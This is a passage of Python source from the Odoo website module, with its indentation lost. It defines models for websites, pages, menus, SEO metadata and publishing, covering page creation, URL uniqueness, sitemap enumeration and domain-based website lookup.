result = super(Website, self - public_user_to_change_websites).write(values)
if 'cdn_activated' in values or 'cdn_url' in values or 'cdn_filters' in values:
# invalidate the caches from static node at compile time
self.env['ir.qweb'].clear_caches()
return result
@api.multi
def unlink(self):
# Do not delete invoices, delete what's strictly necessary
attachments_to_unlink = self.env['ir.attachment'].search([
('website_id', 'in', self.ids),
'|', '|',
('key', '!=', False), # theme attachment
('url', 'ilike', '.custom.'), # customized theme attachment
('url', 'ilike', '.assets\\_'),
])
attachments_to_unlink.unlink()
return super(Website, self).unlink()
# ----------------------------------------------------------
# Page Management
# ----------------------------------------------------------
def _bootstrap_homepage(self):
standard_homepage = self.env.ref('website.homepage', raise_if_not_found=False)
if not standard_homepage:
return
new_homepage_view = '''<t name="Homepage" t-name="website.homepage%s">
<t t-call="website.layout">
<t t-set="pageName" t-value="'homepage'"/>
<div id="wrap" class="oe_structure oe_empty"/>
</t>
</t>''' % (self.id)
standard_homepage.with_context(website_id=self.id).arch_db = new_homepage_view
self.homepage_id = self.env['website.page'].search([('website_id', '=', self.id),
('key', '=', standard_homepage.key)])
# prevent /-1 as homepage URL
self.homepage_id.url = '/'
# Bootstrap default menu hierarchy, create a new minimalist one if no default
default_menu = self.env.ref('website.main_menu')
self.copy_menu_hierarchy(default_menu)
def copy_menu_hierarchy(self, top_menu):
def copy_menu(menu, t_menu):
new_menu = menu.copy({
'parent_id': t_menu.id,
'website_id': self.id,
})
for submenu in menu.child_id:
copy_menu(submenu, new_menu)
for website in self:
new_top_menu = top_menu.copy({
'name': _('Top Menu for Website %s') % website.id,
'website_id': website.id,
})
for submenu in top_menu.child_id:
copy_menu(submenu, new_top_menu)
@api.model
def new_page(self, name=False, add_menu=False, template='website.default_page', ispage=True, namespace=None):
""" Create a new website page, and assign it a xmlid based on the given one
:param name : the name of the page
:param template : potential xml_id of the page to create
:param namespace : module part of the xml_id if none, the template module name is used
"""
if namespace:
template_module = namespace
else:
template_module, _ = template.split('.')
page_url = '/' + slugify(name, max_length=1024, path=True)
page_url = self.get_unique_path(page_url)
page_key = slugify(name)
result = dict({'url': page_url, 'view_id': False})
if not name:
name = 'Home'
page_key = 'home'
template_record = self.env.ref(template)
website_id = self._context.get('website_id')
key = self.get_unique_key(page_key, template_module)
view = template_record.copy({'website_id': website_id, 'key': key})
view.with_context(lang=None).write({
'arch': template_record.arch.replace(template, key),
'name': name,
})
if view.arch_fs:
view.arch_fs = False
website = self.get_current_website()
if ispage:
page = self.env['website.page'].create({
'url': page_url,
'website_id': website.id, # remove it if only one webiste or not?
'view_id': view.id,
})
result['view_id'] = view.id
if add_menu:
self.env['website.menu'].create({
'name': name,
'url': page_url,
'parent_id': website.menu_id.id,
'page_id': page.id,
'website_id': website.id,
})
return result
@api.model
def guess_mimetype(self):
return _guess_mimetype()
def get_unique_path(self, page_url):
""" Given an url, return that url suffixed by counter if it already exists
:param page_url : the url to be checked for uniqueness
"""
inc = 0
# we only want a unique_path for website specific.
# we need to be able to have /url for website=False, and /url for website=1
# in case of duplicate, page manager will allow you to manage this case
domain_static = [('website_id', '=', self.get_current_website().id)] # .website_domain()
page_temp = page_url
while self.env['website.page'].with_context(active_test=False).sudo().search([('url', '=', page_temp)] + domain_static):
inc += 1
page_temp = page_url + (inc and "-%s" % inc or "")
return page_temp
def get_unique_key(self, string, template_module=False):
""" Given a string, return an unique key including module prefix.
It will be suffixed by a counter if it already exists to garantee uniqueness.
:param string : the key to be checked for uniqueness, you can pass it with 'website.' or not
:param template_module : the module to be prefixed on the key, if not set, we will use website
"""
if template_module:
string = template_module + '.' + string
else:
if not string.startswith('website.'):
string = 'website.' + string
# Look for unique key
key_copy = string
inc = 0
domain_static = self.get_current_website().website_domain()
while self.env['website.page'].with_context(active_test=False).sudo().search([('key', '=', key_copy)] + domain_static):
inc += 1
key_copy = string + (inc and "-%s" % inc or "")
return key_copy
@api.model
def page_search_dependencies(self, page_id=False):
""" Search dependencies just for information. It will not catch 100%
of dependencies and False positive is more than possible
Each module could add dependences in this dict
:returns a dictionnary where key is the 'categorie' of object related to the given
view, and the value is the list of text and link to the resource using given page
"""
dependencies = {}
if not page_id:
return dependencies
page = self.env['website.page'].browse(int(page_id))
website = self.env['website'].browse(self._context.get('website_id'))
url = page.url
# search for website_page with link
website_page_search_dom = [('view_id.arch_db', 'ilike', url)] + website.website_domain()
pages = self.env['website.page'].search(website_page_search_dom)
page_key = _('Page')
if len(pages) > 1:
page_key = _('Pages')
page_view_ids = []
for page in pages:
dependencies.setdefault(page_key, [])
dependencies[page_key].append({
'text': _('Page <b>%s</b> contains a link to this page') % page.url,
'item': page.name,
'link': page.url,
})
page_view_ids.append(page.view_id.id)
# search for ir_ui_view (not from a website_page) with link
page_search_dom = [('arch_db', 'ilike', url), ('id', 'not in', page_view_ids)] + website.website_domain()
views = self.env['ir.ui.view'].search(page_search_dom)
view_key = _('Template')
if len(views) > 1:
view_key = _('Templates')
for view in views:
dependencies.setdefault(view_key, [])
dependencies[view_key].append({
'text': _('Template <b>%s (id:%s)</b> contains a link to this page') % (view.key or view.name, view.id),
'link': '/web#id=%s&view_type=form&model=ir.ui.view' % view.id,
'item': _('%s (id:%s)') % (view.key or view.name, view.id),
})
# search for menu with link
menu_search_dom = [('url', 'ilike', '%s' % url)] + website.website_domain()
menus = self.env['website.menu'].search(menu_search_dom)
menu_key = _('Menu')
if len(menus) > 1:
menu_key = _('Menus')
for menu in menus:
dependencies.setdefault(menu_key, []).append({
'text': _('This page is in the menu <b>%s</b>') % menu.name,
'link': '/web#id=%s&view_type=form&model=website.menu' % menu.id,
'item': menu.name,
})
return dependencies
@api.model
def page_search_key_dependencies(self, page_id=False):
""" Search dependencies just for information. It will not catch 100%
of dependencies and False positive is more than possible
Each module could add dependences in this dict
:returns a dictionnary where key is the 'categorie' of object related to the given
view, and the value is the list of text and link to the resource using given page
"""
dependencies = {}
if not page_id:
return dependencies
page = self.env['website.page'].browse(int(page_id))
website = self.env['website'].browse(self._context.get('website_id'))
key = page.key
# search for website_page with link
website_page_search_dom = [
('view_id.arch_db', 'ilike', key),
('id', '!=', page.id)
] + website.website_domain()
pages = self.env['website.page'].search(website_page_search_dom)
page_key = _('Page')
if len(pages) > 1:
page_key = _('Pages')
page_view_ids = []
for p in pages:
dependencies.setdefault(page_key, [])
dependencies[page_key].append({
'text': _('Page <b>%s</b> is calling this file') % p.url,
'item': p.name,
'link': p.url,
})
page_view_ids.append(p.view_id.id)
# search for ir_ui_view (not from a website_page) with link
page_search_dom = [
('arch_db', 'ilike', key), ('id', 'not in', page_view_ids),
('id', '!=', page.view_id.id),
] + website.website_domain()
views = self.env['ir.ui.view'].search(page_search_dom)
view_key = _('Template')
if len(views) > 1:
view_key = _('Templates')
for view in views:
dependencies.setdefault(view_key, [])
dependencies[view_key].append({
'text': _('Template <b>%s (id:%s)</b> is calling this file') % (view.key or view.name, view.id),
'item': _('%s (id:%s)') % (view.key or view.name, view.id),
'link': '/web#id=%s&view_type=form&model=ir.ui.view' % view.id,
})
return dependencies
# ----------------------------------------------------------
# Languages
# ----------------------------------------------------------
@api.multi
def get_languages(self):
self.ensure_one()
return self._get_languages()
@tools.cache('self.id')
def _get_languages(self):
return [(lg.code, lg.name) for lg in self.language_ids]
@api.multi
def get_alternate_languages(self, req=None):
langs = []
if req is None:
req = request.httprequest
default = self.get_current_website().default_lang_code
shorts = []
def get_url_localized(router, lang):
arguments = dict(request.endpoint_arguments)
for key, val in list(arguments.items()):
if isinstance(val, models.BaseModel):
arguments[key] = val.with_context(lang=lang)
return router.build(request.endpoint, arguments)
router = request.httprequest.app.get_db_router(request.db).bind('')
for code, dummy in self.get_languages():
lg_path = ('/' + code) if code != default else ''
lg_codes = code.split('_')
shorts.append(lg_codes[0])
uri = get_url_localized(router, code) if request.endpoint else request.httprequest.path
if req.query_string:
uri += u'?' + req.query_string.decode('utf-8')
lang = {
'hreflang': ('-'.join(lg_codes)).lower(),
'short': lg_codes[0],
'href': req.url_root[0:-1] + lg_path + uri,
}
langs.append(lang)
for lang in langs:
if shorts.count(lang['short']) == 1:
lang['hreflang'] = lang['short']
return langs
# ----------------------------------------------------------
# Utilities
# ----------------------------------------------------------
@api.model
def get_current_website(self, fallback=True):
if request and request.session.get('force_website_id'):
return self.browse(request.session['force_website_id'])
website_id = self.env.context.get('website_id')
if website_id:
return self.browse(website_id)
# The format of `httprequest.host` is `domain:port`
domain_name = request and request.httprequest.host or ''
country = request.session.geoip.get('country_code') if request and request.session.geoip else False
country_id = False
if country:
country_id = self.env['res.country'].search([('code', '=', country)], limit=1).id
website_id = self._get_current_website_id(domain_name, country_id, fallback=fallback)
return self.browse(website_id)
@tools.cache('domain_name', 'country_id', 'fallback')
@api.model
def _get_current_website_id(self, domain_name, country_id, fallback=True):
"""Get the current website id.
First find all the websites for which the configured `domain` (after
ignoring a potential scheme) is equal to the given
`domain_name`. If there is only one result, return it immediately.
If there are no website found for the given `domain_name`, either
fallback to the first found website (no matter its `domain`) or return
False depending on the `fallback` parameter.
If there are multiple websites for the same `domain_name`, we need to
filter them out by country. We return the first found website matching
the given `country_id`. If no found website matching `domain_name`
corresponds to the given `country_id`, the first found website for
`domain_name` will be returned (no matter its country).
:param domain_name: the domain for which we want the website.
In regard to the `url_parse` method, only the `netloc` part should
be given here, no `scheme`.
:type domain_name: string
:param country_id: id of the country for which we want the website
:type country_id: int
:param fallback: if True and no website is found for the specificed
`domain_name`, return the first website (without filtering them)
:type fallback: bool
:return: id of the found website, or False if no website is found and
`fallback` is False
:rtype: int or False
:raises: if `fallback` is True but no website at all is found
"""
def _remove_port(domain_name):
return (domain_name or '').split(':')[0]
def _filter_domain(website, domain_name, ignore_port=False):
"""Ignore `scheme` from the `domain`, just match the `netloc` which
is host:port in the version of `url_parse` we use."""
# Here we add http:// to the domain if it's not set because
# `url_parse` expects it to be set to correctly return the `netloc`.
website_domain = urls.url_parse(website._get_http_domain()).netloc
if ignore_port:
website_domain = _remove_port(website_domain)
domain_name = _remove_port(domain_name)
return website_domain.lower() == (domain_name or '').lower()
# Sort on country_group_ids so that we fall back on a generic website:
# websites with empty country_group_ids will be first.
found_websites = self.search([('domain', 'ilike', _remove_port(domain_name))]).sorted('country_group_ids')
# Filter for the exact domain (to filter out potential subdomains) due
# to the use of ilike.
websites = found_websites.filtered(lambda w: _filter_domain(w, domain_name))
# If there is no domain matching for the given port, ignore the port.
websites = websites or found_websites.filtered(lambda w: _filter_domain(w, domain_name, ignore_port=True))
if not websites:
if not fallback:
return False
return self.search([], limit=1).id
elif len(websites) == 1:
return websites.id
else: # > 1 website with the same domain
country_specific_websites = websites.filtered(lambda website: country_id in website.country_group_ids.mapped('country_ids').ids)
return country_specific_websites[0].id if country_specific_websites else websites[0].id
def _force(self):
self._force_website(self.id)
def _force_website(self, website_id):
if request:
request.session['force_website_id'] = website_id and str(website_id).isdigit() and int(website_id)
@api.model
def is_publisher(self):
return self.env['ir.model.access'].check('ir.ui.view', 'write', False)
@api.model
def is_user(self):
return self.env['ir.model.access'].check('ir.ui.menu', 'read', False)
@api.model
def is_public_user(self):
return request.env.user.id == request.website.user_id.id
@api.model
def viewref(self, view_id, raise_if_not_found=True):
''' Given an xml_id or a view_id, return the corresponding view record.
In case of website context, return the most specific one.
If no website_id is in the context, it will return the generic view,
instead of a random one like `get_view_id`.
Look also for archived views, no matter the context.
:param view_id: either a string xml_id or an integer view_id
:param raise_if_not_found: should the method raise an error if no view found
:return: The view record or empty recordset
'''
View = self.env['ir.ui.view']
view = View
if isinstance(view_id, pycompat.string_types):
if 'website_id' in self._context:
domain = [('key', '=', view_id)] + self.env['website'].website_domain(self._context.get('website_id'))
order = 'website_id'
else:
domain = [('key', '=', view_id)]
order = View._order
views = View.with_context(active_test=False).search(domain, order=order)
if views:
view = views.filter_duplicate()
else:
# we handle the raise below
view = self.env.ref(view_id, raise_if_not_found=False)
# self.env.ref might return something else than an ir.ui.view (eg: a theme.ir.ui.view)
if not view or view._name != 'ir.ui.view':
# make sure we always return a recordset
view = View
elif isinstance(view_id, pycompat.integer_types):
view = View.browse(view_id)
else:
raise ValueError('Expecting a string or an integer, not a %s.' % (type(view_id)))
if not view and raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (view_id))
return view
@api.model
def get_template(self, template):
View = self.env['ir.ui.view']
if isinstance(template, pycompat.integer_types):
view_id = template
else:
if '.' not in template:
template = 'website.%s' % template
view_id = View.get_view_id(template)
if not view_id:
raise NotFound
return View.browse(view_id)
@api.model
def pager(self, url, total, page=1, step=30, scope=5, url_args=None):
return pager(url, total, page=page, step=step, scope=scope, url_args=url_args)
def rule_is_enumerable(self, rule):
""" Checks that it is possible to generate sensible GET queries for
a given rule (if the endpoint matches its own requirements)
:type rule: werkzeug.routing.Rule
:rtype: bool
"""
endpoint = rule.endpoint
methods = endpoint.routing.get('methods') or ['GET']
converters = list(rule._converters.values())
if not ('GET' in methods and
endpoint.routing['type'] == 'http' and
endpoint.routing['auth'] in ('none', 'public') and
endpoint.routing.get('website', False) and
all(hasattr(converter, 'generate') for converter in converters)):
return False
# dont't list routes without argument having no default value or converter
spec = inspect.getargspec(endpoint.method.original_func)
# remove self and arguments having a default value
defaults_count = len(spec.defaults or [])
args = spec.args[1:(-defaults_count or None)]
# check that all args have a converter
return all((arg in rule._converters) for arg in args)
@api.multi
def enumerate_pages(self, query_string=None, force=False):
""" Available pages in the website/CMS. This is mostly used for links
generation and can be overridden by modules setting up new HTML
controllers for dynamic pages (e.g. blog).
By default, returns template views marked as pages.
:param str query_string: a (user-provided) string, fetches pages
matching the string
:returns: a list of mappings with two keys: ``name`` is the displayable
name of the resource (page), ``url`` is the absolute URL
of the same.
:rtype: list({name: str, url: str})
"""
router = request.httprequest.app.get_db_router(request.db)
# Force enumeration to be performed as public user
url_set = set()
sitemap_endpoint_done = set()
for rule in router.iter_rules():
if 'sitemap' in rule.endpoint.routing:
if rule.endpoint in sitemap_endpoint_done:
continue
sitemap_endpoint_done.add(rule.endpoint)
func = rule.endpoint.routing['sitemap']
if func is False:
continue
for loc in func(self.env, rule, query_string):
yield loc
continue
if not self.rule_is_enumerable(rule):
continue
converters = rule._converters or {}
if query_string and not converters and (query_string not in rule.build([{}], append_unknown=False)[1]):
continue
values = [{}]
# converters with a domain are processed after the other ones
convitems = sorted(
converters.items(),
key=lambda x: (hasattr(x[1], 'domain') and (x[1].domain != '[]'), rule._trace.index((True, x[0]))))
for (i, (name, converter)) in enumerate(convitems):
newval = []
for val in values:
query = i == len(convitems) - 1 and query_string
if query:
r = "".join([x[1] for x in rule._trace[1:] if not x[0]]) # remove model converter from route
query = sitemap_qs2dom(query, r, self.env[converter.model]._rec_name)
if query == FALSE_DOMAIN:
continue
for value_dict in converter.generate(uid=self.env.uid, dom=query, args=val):
newval.append(val.copy())
value_dict[name] = value_dict['loc']
del value_dict['loc']
newval[-1].update(value_dict)
values = newval
for value in values:
domain_part, url = rule.build(value, append_unknown=False)
if not query_string or query_string.lower() in url.lower():
page = {'loc': url}
if url in ('/sitemap.xml',):
continue
if url in url_set:
continue
url_set.add(url)
yield page
# '/' already has a http.route & is in the routing_map so it will already have an entry in the xml
domain = [('url', '!=', '/')]
if not force:
domain += [('website_indexed', '=', True)]
# is_visible
domain += [('website_published', '=', True), '|', ('date_publish', '=', False), ('date_publish', '<=', fields.Datetime.now())]
if query_string:
domain += [('url', 'like', query_string)]
pages = self.get_website_pages(domain)
for page in pages:
record = {'loc': page['url'], 'id': page['id'], 'name': page['name']}
if page.view_id and page.view_id.priority != 16:
record['priority'] = min(round(page.view_id.priority / 32.0, 1), 1)
if page['write_date']:
record['lastmod'] = page['write_date'].date()
yield record
@api.multi
def get_website_pages(self, domain=[], order='name', limit=None):
domain += self.get_current_website().website_domain()
pages = self.env['website.page'].search(domain, order='name', limit=limit)
return pages
@api.multi
def search_pages(self, needle=None, limit=None):
name = slugify(needle, max_length=50, path=True)
res = []
for page in self.enumerate_pages(query_string=name, force=True):
res.append(page)
if len(res) == limit:
break
return res
@api.model
def image_url(self, record, field, size=None):
""" Returns a local url that points to the image field of a given browse record. """
sudo_record = record.sudo()
sha = hashlib.sha1(str(getattr(sudo_record, '__last_update')).encode('utf-8')).hexdigest()[0:7]
size = '' if size is None else '/%s' % size
return '/web/image/%s/%s/%s%s?unique=%s' % (record._name, record.id, field, size, sha)
def get_cdn_url(self, uri):
self.ensure_one()
if not uri:
return ''
cdn_url = self.cdn_url
cdn_filters = (self.cdn_filters or '').splitlines()
for flt in cdn_filters:
if flt and re.match(flt, uri):
return urls.url_join(cdn_url, uri)
return uri
@api.model
def action_dashboard_redirect(self):
if self.env.user.has_group('base.group_system') or self.env.user.has_group('website.group_website_designer'):
return self.env.ref('website.backend_dashboard').read()[0]
return self.env.ref('website.action_website').read()[0]
def button_go_website(self):
self._force()
return {
'type': 'ir.actions.act_url',
'url': '/',
'target': 'self',
}
@api.multi
def _get_http_domain(self):
"""Get the domain of the current website, prefixed by http if no
scheme is specified.
Empty string if no domain is specified on the website.
"""
self.ensure_one()
if not self.domain:
return ''
res = urls.url_parse(self.domain)
return 'http://' + self.domain if not res.scheme else self.domain
class SeoMetadata(models.AbstractModel):
_name = 'website.seo.metadata'
_description = 'SEO metadata'
is_seo_optimized = fields.Boolean("SEO optimized", compute='_compute_is_seo_optimized')
website_meta_title = fields.Char("Website meta title", translate=True)
website_meta_description = fields.Text("Website meta description", translate=True)
website_meta_keywords = fields.Char("Website meta keywords", translate=True)
website_meta_og_img = fields.Char("Website opengraph image")
@api.multi
def _compute_is_seo_optimized(self):
for record in self:
record.is_seo_optimized = record.website_meta_title and record.website_meta_description and record.website_meta_keywords
def _default_website_meta(self):
""" This method will return default meta information. It return the dict
contains meta property as a key and meta content as a value.
e.g. 'og:type': 'website'.
Override this method in case you want to change default value
from any model. e.g. change value of og:image to product specific
images instead of default images
"""
self.ensure_one()
company = request.website.company_id.sudo()
title = (request.website or company).name
if 'name' in self:
title = '%s | %s' % (self.name, title)
if request.website.social_default_image:
img = '/web/image/website/%s/social_default_image' % request.website.id
else:
img = '/web/image/res.company/%s/logo' % company.id
# Default meta for OpenGraph
default_opengraph = {
'og:type': 'website',
'og:title': title,
'og:site_name': company.name,
'og:url': request.httprequest.url,
'og:image': img,
}
# Default meta for Twitter
default_twitter = {
'twitter:card': 'summary_large_image',
'twitter:title': title,
'twitter:image': img + '/300x300',
}
if company.social_twitter:
default_twitter['twitter:site'] = "@%s" % company.social_twitter.split('/')[-1]
return {
'default_opengraph': default_opengraph,
'default_twitter': default_twitter
}
def get_website_meta(self):
""" This method will return final meta information. It will replace
default values with user's custom value (if user modified it from
the seo popup of fronted)
This method is not meant for overridden. To customize meta values
override `_default_website_meta` method instead of this method. This
method only replaces user custom values in defaults.
"""
root_url = request.httprequest.url_root.strip('/')
default_meta = self._default_website_meta()
opengraph_meta, twitter_meta = default_meta['default_opengraph'], default_meta['default_twitter']
if self.website_meta_title:
opengraph_meta['og:title'] = self.website_meta_title
twitter_meta['twitter:title'] = self.website_meta_title
if self.website_meta_description:
opengraph_meta['og:description'] = self.website_meta_description
twitter_meta['twitter:description'] = self.website_meta_description
meta_image = self.website_meta_og_img or opengraph_meta['og:image']
if meta_image.startswith('/'):
meta_image = "%s%s" % (root_url, meta_image)
opengraph_meta['og:image'] = meta_image
twitter_meta['twitter:image'] = meta_image
return {
'opengraph_meta': opengraph_meta,
'twitter_meta': twitter_meta
}
class WebsiteMultiMixin(models.AbstractModel):
_name = 'website.multi.mixin'
_description = 'Multi Website Mixin'
website_id = fields.Many2one('website', string='Website', ondelete='restrict', help='Restrict publishing to this website.')
@api.multi
def can_access_from_current_website(self, website_id=False):
can_access = True
for record in self:
if (website_id or record.website_id.id) not in (False, request.website.id):
can_access = False
continue
return can_access
class WebsitePublishedMixin(models.AbstractModel):
_name = "website.published.mixin"
_description = 'Website Published Mixin'
website_published = fields.Boolean('Visible on current website', related='is_published', readonly=False)
is_published = fields.Boolean('Is published', copy=False)
website_url = fields.Char('Website URL', compute='_compute_website_url', help='The full URL to access the document through the website.')
@api.multi
def _compute_website_url(self):
for record in self:
record.website_url = '#'
@api.multi
def website_publish_button(self):
self.ensure_one()
if self.env.user.has_group('website.group_website_publisher') and self.website_url != '#':
# Force website to land on record's website to publish/unpublish it
if 'website_id' in self and self.env.user.has_group('website.group_multi_website'):
self.website_id._force()
return self.open_website_url()
return self.write({'website_published': not self.website_published})
def open_website_url(self):
return {
'type': 'ir.actions.act_url',
'url': self.website_url,
'target': 'self',
}
def create_and_get_website_url(self, **kwargs):
return self.create(kwargs).website_url
class WebsitePublishedMultiMixin(WebsitePublishedMixin):
_name = 'website.published.multi.mixin'
_inherit = ['website.published.mixin', 'website.multi.mixin']
_description = 'Multi Website Published Mixin'
website_published = fields.Boolean(compute='_compute_website_published',
inverse='_inverse_website_published',
search='_search_website_published',
related=False, readonly=False)
@api.multi
@api.depends('is_published', 'website_id')
def _compute_website_published(self):
current_website_id = self._context.get('website_id')
for record in self:
if current_website_id:
record.website_published = record.is_published and (not record.website_id or record.website_id.id == current_website_id)
else:
record.website_published = record.is_published
@api.multi
def _inverse_website_published(self):
for record in self:
record.is_published = record.website_published
def _search_website_published(self, operator, value):
if not isinstance(value, bool) or operator not in ('=', '!='):
logger.warning('unsupported search on website_published: %s, %s', operator, value)
return [()]
if operator in expression.NEGATIVE_TERM_OPERATORS:
value = not value
current_website_id = self._context.get('website_id')
is_published = [('is_published', '=', value)]
if current_website_id:
on_current_website = self.env['website'].website_domain(current_website_id)
return (['!'] if value is False else []) + expression.AND([is_published, on_current_website])
else: # should be in the backend, return things that are published anywhere
return is_published
class Page(models.Model):
_name = 'website.page'
_inherits = {'ir.ui.view': 'view_id'}
_inherit = 'website.published.multi.mixin'
_description = 'Page'
_order = 'website_id'
url = fields.Char('Page URL')
view_id = fields.Many2one('ir.ui.view', string='View', required=True, ondelete="cascade")
website_indexed = fields.Boolean('Page Indexed', default=True)
date_publish = fields.Datetime('Publishing Date')
# This is needed to be able to display if page is a menu in /website/pages
menu_ids = fields.One2many('website.menu', 'page_id', 'Related Menus')
is_homepage = fields.Boolean(compute='_compute_homepage', inverse='_set_homepage', string='Homepage')
is_visible = fields.Boolean(compute='_compute_visible', string='Is Visible')
# Page options
header_overlay = fields.Boolean()
header_color = fields.Char()
# don't use mixin website_id but use website_id on ir.ui.view instead
website_id = fields.Many2one(related='view_id.website_id', store=True, readonly=False)
@api.one
def _compute_homepage(self):
self.is_homepage = self == self.env['website'].get_current_website().homepage_id
@api.one
def _set_homepage(self):
website = self.env['website'].get_current_website()
if self.is_homepage:
if website.homepage_id != self:
website.write({'homepage_id': self.id})
else:
if website.homepage_id == self:
website.write({'homepage_id': None})
@api.one
def _compute_visible(self):
self.is_visible = self.website_published and (not self.date_publish or self.date_publish < fields.Datetime.now())
@api.multi
def _is_most_specific_page(self, page_to_test):
'''This will test if page_to_test is the most specific page in self.'''
pages_for_url = self.sorted(key=lambda p: not p.website_id).filtered(lambda page: page.url == page_to_test.url)
# this works because pages are _order'ed by website_id
most_specific_page = pages_for_url[0]
return most_specific_page == page_to_test
@api.model
def get_page_info(self, id):
return self.browse(id).read(
['id', 'name', 'url', 'website_published', 'website_indexed', 'date_publish', 'menu_ids', 'is_homepage', 'website_id'],
)
@api.multi
def get_view_identifier(self):
""" Get identifier of this page view that may be used to render it """
return self.view_id.id
@api.model
def save_page_info(self, website_id, data):
website = self.env['website'].browse(website_id)
page = self.browse(int(data['id']))
# If URL has been edited, slug it
original_url = page.url
url = data['url']
if not url.startswith('/'):
url = '/' + url
if page.url != url:
url = '/' + slugify(url, max_length=1024, path=True)
url = self.env['website'].get_unique_path(url)
# If name has changed, check for key uniqueness
if page.name != data['name']:
page_key = self.env['website'].get_unique_key(slugify(data['name']))
else:
page_key = page.key
menu = self.env['website.menu'].search([('page_id', '=', int(data['id']))])
if not data['is_menu']:
# If the page is no longer in menu, we should remove its website_menu
if menu:
menu.unlink()
else:
# The page is now a menu, check if has already one
if menu:
menu.write({'url': url})
else:
self.env['website.menu'].create({
'name': data['name'],
'url': url,
'page_id': data['id'],
'parent_id': website.menu_id.id,
'website_id': website.id,
})
# Edits via the page manager shouldn't trigger the COW
# mechanism and generate new pages. The user manages page
# visibility manually with is_published here.
w_vals = {
'key': page_key,
'name': data['name'],
'url': url,
'is_published': data['website_published'],
'website_indexed': data['website_indexed'],
'date_publish': data['date_publish'] or None,
'is_homepage': data['is_homepage'],
}
page.with_context(no_cow=True).write(w_vals)
# Create redirect if needed
if data['create_redirect']:
self.env['website.redirect'].create({
'type': data['redirect_type'],
'url_from': original_url,
'url_to': url,
'website_id': website.id,
})
return url
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
if default:
if not default.get('view_id'):
view = self.env['ir.ui.view'].browse(self.view_id.id)
new_view = view.copy({'website_id': default.get('website_id')})
default['view_id'] = new_view.id
default['url'] = default.get('url', self.env['website'].get_unique_path(self.url))
return super(Page, self).copy(default=default)
@api.model
def clone_page(self, page_id, clone_menu=True):
""" Clone a page, given its identifier
:param page_id : website.page identifier
"""
page = self.browse(int(page_id))
new_page = page.copy(dict(name=page.name, website_id=self.env['website'].get_current_website().id))
# Should not clone menu if the page was cloned from one website to another
# Eg: Cloning a generic page (no website) will create a page with a website, we can't clone menu (not same container)
if clone_menu and new_page.website_id == page.website_id:
menu = self.env['website.menu'].search([('page_id', '=', page_id)], limit=1)
if menu:
# If the page being cloned has a menu, clone it too
menu.copy({'url': new_page.url, 'name': menu.name, 'page_id': new_page.id})
return new_page.url + '?enable_editor=1'
@api.multi
def unlink(self):
# When a website_page is deleted, the ORM does not delete its
# ir_ui_view. So we got to delete it ourself, but only if the
# ir_ui_view is not used by another website_page.
for page in self:
# Other pages linked to the ir_ui_view of the page being deleted (will it even be possible?)
pages_linked_to_iruiview = self.search(
[('view_id', '=', page.view_id.id), ('id', '!=', page.id)]
)
if not pages_linked_to_iruiview and not page.view_id.inherit_children_ids:
# If there is no other pages linked to that ir_ui_view, we can delete the ir_ui_view
page.view_id.unlink()
return super(Page, self).unlink()
@api.multi
def write(self, vals):
if 'url' in vals and not vals['url'].startswith('/'):
vals['url'] = '/' + vals['url']
return super(Page, self).write(vals)
def get_website_meta(self):
self.ensure_one()
return self.view_id.get_website_meta()
class Menu(models.Model):
_name = "website.menu"
_description = "Website Menu"
_parent_store = True
_order = "sequence, id"
def _default_sequence(self):
menu = self.search([], limit=1, order="sequence DESC")
return menu.sequence or 0
name = fields.Char('Menu', required=True, translate=True)
url = fields.Char('Url', default='')
page_id = fields.Many2one('website.page', 'Related Page', ondelete='cascade')
new_window = fields.Boolean('New Window')
sequence = fields.Integer(default=_default_sequence)
website_id = fields.Many2one('website', 'Website', ondelete='cascade')
parent_id = fields.Many2one('website.menu', 'Parent Menu', index=True, ondelete="cascade")
child_id = fields.One2many('website.menu', 'parent_id', string='Child Menus')
parent_path = fields.Char(index=True)
is_visible = fields.Boolean(compute='_compute_visible', string='Is Visible')
@api.multi
def name_get(self):
res = []
for menu in self:
website_suffix = '%s - %s' % (menu.name, menu.website_id.name)
res.append((menu.id, website_suffix if menu.website_id and self.env.user.has_group('website.group_multi_website') else menu.name))
return res
@api.model
def create(self, vals):
''' In case a menu without a website_id is trying to be created, we duplicate
it for every website.
Note: Particulary useful when installing a module that adds a menu like
/shop. So every website has the shop menu.
Be careful to return correct record for ir.model.data xml_id in case
of default main menus creation.
'''
# Only used when creating website_data.xml default menu
if vals.get('url') == '/default-main-menu':
return super(Menu, self).create(vals)
if 'website_id' in vals:
return super(Menu, self).create(vals)
elif self._context.get('website_id'):
vals['website_id'] = self._context.get('website_id')
return super(Menu, self).create(vals)
else:
# create for every site
for website in self.env['website'].search([]):
w_vals = dict(vals, **{
'website_id': website.id,
'parent_id': website.menu_id.id,
})
res = super(Menu, self).create(w_vals)
# if creating a default menu, we should also save it as such
default_menu = self.env.ref('website.main_menu', raise_if_not_found=False)
if default_menu and vals.get('parent_id') == default_menu.id:
res = super(Menu, self).create(vals)
return res # Only one record is returned but multiple could have been created
@api.multi
def unlink(self):
default_menu = self.env.ref('website.main_menu', raise_if_not_found=False)
menus_to_remove = self
for menu in self.filtered(lambda m: default_menu and m.parent_id.id == default_menu.id):
menus_to_remove |= self.env['website.menu'].search([('url', '=', menu.url),
('website_id', '!=', False),
('id', '!=', menu.id)])
return super(Menu, menus_to_remove).unlink()
@api.one
def _compute_visible(self):
visible = True
if self.page_id and not self.page_id.sudo().is_visible and not self.user_has_groups('base.group_user'):
visible = False
self.is_visible = visible
@api.model
def clean_url(self):
# clean the url with heuristic
if self.page_id:
url = self.page_id.sudo().url
else:
url = self.url
if url and not self.url.startswith('/'):
if '@' in self.url:
if not self.url.startswith('mailto'):
url = 'mailto:%s' % self.url
elif not self.url.startswith('http'):
url = '/%s' % self.url
return url
# would be better to take a menu_id as argument
@api.model
def get_tree(self, website_id, menu_id=None):
def make_tree(node):
page_id = node.page_id.id if node.page_id else None
is_homepage = page_id and self.env['website'].browse(website_id).homepage_id.id == page_id
menu_node = dict(
id=node.id,
name=node.name,
url=node.page_id.url if page_id else node.url,
new_window=node.new_window,
sequence=node.sequence,
parent_id=node.parent_id.id,
children=[],
is_homepage=is_homepage,
)
for child in node.child_id:
menu_node['children'].append(make_tree(child))
return menu_node
if menu_id:
menu = self.browse(menu_id)
else:
menu = self.env['website'].browse(website_id).menu_id
return make_tree(menu)
@api.model
def save(self, website_id, data):
def replace_id(old_id, new_id):
for menu in data['data']:
if menu['id'] == old_id:
menu['id'] = new_id
if menu['parent_id'] == old_id:
menu['parent_id'] = new_id
to_delete = data['to_delete']
